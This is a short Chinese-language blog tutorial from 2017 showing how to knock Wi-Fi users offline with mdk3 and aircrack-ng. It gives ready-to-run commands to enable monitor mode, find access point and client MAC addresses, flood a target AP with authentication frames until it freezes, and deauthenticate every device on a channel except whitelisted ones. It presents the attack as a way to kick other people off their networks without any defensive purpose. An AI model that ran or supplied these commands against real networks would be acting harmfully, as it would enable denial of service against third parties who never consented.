作者: NONO
2017-02-08 11:07:08
准备
1:系统环境为ubuntu16.04,
2:需要mdk3,mdk3这个软件需要通过apt安装,需要kali系统的源
3:需要安装aircrack-ng套件
今天这套东西,可以在未连接上靶机网络的情况下,把别人的机器踢掉线
Authentication Flood Attack
攻击指定的wifi热点,只要知道wifi热点的MAC地址即可,
先把本地网卡设置为混杂模式,wlx001d0f04f093为网卡的名字
sudo airmon-ng start wlx001d0f04f093
通过airodump ,获取wifi热点的MAC, 下图就是附近的所有WIFI信息:
sudo airodump-ng mon0
所用MDK3命令,-a 后面的参数为AP的热点MAC:
sudo mdk3 mon0 a -a D4:83:04:9F:37:28
上面一条命令会循环发送大量验证信息给AP,过不了几分钟,AP就会卡死, 如果路由器有防DOS的功能的话,这个不好用
De-authentication Flood Attack / Deauth攻击
攻击指定的频道, 让频道为 11 所有计算机都掉线:
sudo mdk3 mon0 d -c 11
只要频道为11的所有计算机都会掉线
在本地创建一个白名单的文本文件whiltelist.txt,只要在白名单内部的AP或者客户机,都可以正常上网:
执行代码:
sudo mdk3 mon0 d -c 11 -w "whitelist.txt"
此时, 除了MAC地址为 50:7A:55:DE:C1:C0 的用户,所有的计算机或者移动设备都会被踢下线, 这个非常好用;
有些同学会疑惑, 我怎么拿到受害机器的MAC地址,在执行 sudo airodump-ng mon0,的显示结果页下面就有 客户机的连接消息:
